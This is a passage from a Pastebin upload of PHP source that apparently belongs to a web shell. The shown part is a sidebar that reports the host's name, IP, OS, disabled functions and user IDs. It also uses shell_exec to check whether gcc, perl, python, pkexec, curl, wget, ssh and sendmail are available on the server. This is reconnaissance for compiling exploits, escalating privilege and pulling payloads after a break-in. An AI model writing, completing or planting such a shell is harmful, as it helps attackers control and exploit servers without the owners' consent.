  892. <div class="sidebar-content">
  893. <div class="sidebar-close">
  894. <button onclick="toggleSidebar()">Close</button>
  895. </div>
  896. <div class="info-container">
  897. <h2>Server Info</h2>
  898. <?php
  899. function countDomainsInServer()
  900. {
  901. $serverName = $_SERVER['SERVER_NAME'];
  902. $ipAddresses = @gethostbynamel($serverName);
  903.  
  904. if ($ipAddresses !== false) {
  905. return count($ipAddresses);
  906. } else {
  907. return 0;
  908. }
  909. }
  910.  
  911. $domainCount = @countDomainsInServer();
  912.  
  913. function formatBytes($bytes, $precision = 2)
  914. {
  915. $units = array('B', 'KB', 'MB', 'GB', 'TB');
  916.  
  917. $bytes = max($bytes, 0);
  918. $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
  919. $pow = min($pow, count($units) - 1);
  920.  
  921. $bytes /= (1 << (10 * $pow));
  922.  
  923. return round($bytes, $precision) . ' ' . $units[$pow];
  924. }
  925. ?>
  926.  
  927. <ul class="info-list">
  928. <li>Hostname: <?php echo @gethostname(); ?></li>
  929. <?php if (isset($_SERVER['SERVER_ADDR'])) : ?>
  930. <li>IP Address: <?php echo $_SERVER['SERVER_ADDR']; ?></li>
  931. <?php endif; ?>
  932. <li>PHP Version: <?php echo @phpversion(); ?></li>
  933. <li>Server Software: <?php echo $_SERVER['SERVER_SOFTWARE']; ?></li>
  934. <?php if (function_exists('disk_total_space')) : ?>
  935. <li>HDD Total Space: <?php echo @formatBytes(disk_total_space('/')); ?></li>
  936. <li>HDD Free Space: <?php echo @formatBytes(disk_free_space('/')); ?></li>
  937. <?php endif; ?>
  938. <li>Total Domains in Server: <?php echo $domainCount; ?></li>
  939. <li>System: <?php echo @php_uname(); ?></li>
  940. </ul>
  941. </div>
  942.  
  943.  
  944. <div class="info-container">
  945. <h2>System Info</h2>
  946. <ul class="info-list">
  947. <?php
  948. $features = [
  949. 'Safe Mode' => @ini_get('safe_mode') ? 'Enabled' : 'Disabled',
  950. 'Disable Functions' => @ini_get('disable_functions'),
  951. 'GCC' => function_exists('shell_exec') && @shell_exec('gcc --version') ? 'On' : 'Off',
  952. 'Perl' => function_exists('shell_exec') && @shell_exec('perl --version') ? 'On' : 'Off',
  953. 'Python Version' => ($pythonVersion = @shell_exec('python --version')) ? 'On (' . $pythonVersion . ')' : 'Off',
  954. 'PKEXEC Version' => ($pkexecVersion = @shell_exec('pkexec --version')) ? 'On (' . $pkexecVersion . ')' : 'Off',
  955. 'Curl' => function_exists('shell_exec') && @shell_exec('curl --version') ? 'On' : 'Off',
  956. 'Wget' => function_exists('shell_exec') && @shell_exec('wget --version') ? 'On' : 'Off',
  957. 'Mysql' => function_exists('shell_exec') && @shell_exec('mysql --version') ? 'On' : 'Off',
  958. 'Ftp' => function_exists('shell_exec') && @shell_exec('ftp --version') ? 'On' : 'Off',
  959. 'Ssh' => function_exists('shell_exec') && @shell_exec('ssh --version') ? 'On' : 'Off',
  960. 'Mail' => function_exists('shell_exec') && @shell_exec('mail --version') ? 'On' : 'Off',
  961. 'cron' => function_exists('shell_exec') && @shell_exec('cron --version') ? 'On' : 'Off',
  962. 'SendMail' => function_exists('shell_exec') && @shell_exec('sendmail --version') ? 'On' : 'Off',
  963. ];
  964. ?>
  965.  
  966. <label for="feature-select">Select Feature:</label>
  967. <select id="feature-select">
  968. <?php foreach ($features as $feature => $status) : ?>
  969. <option value="<?php echo $feature; ?>"><?php echo $feature . ': ' . $status; ?></option>
  970. <?php endforeach; ?>
  971. </select>
  972. </ul>
  973. </div>
  974.  
  975. <div class="info-container">
  976. <h2>User Info</h2>
  977. <ul class="info-list">
  978. <li>Username: <?php echo @get_current_user(); ?></li>
  979. <li>User ID: <?php echo @getmyuid(); ?></li>
  980. <li>Group ID: <?php echo @getmygid(); ?></li>
  981. </ul>
  982. </div>
  983. </div>
  984. </div>
  985. <script>
  986. function toggleOptionsMenu() {
  987. var optionsMenu = document.getElementById('optionsMenu');
  988. optionsMenu.classList.toggle('show');
  989. }
  990.  
  991. function toggleSidebar() {
  992. var sidebar = document.getElementById('sidebar');
  993. sidebar.classList.toggle('open');
  994. }
  995. </script>
  996. </div>
  997. <div class="footer">
  998. <p>&copy; <?php echo date("Y"); ?> <a href="https://www.blog-gan.org/">Coded By</a> Avaa Code.</p>
  999. </div>
  1000. </body>
  1001. </html>
  1002.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!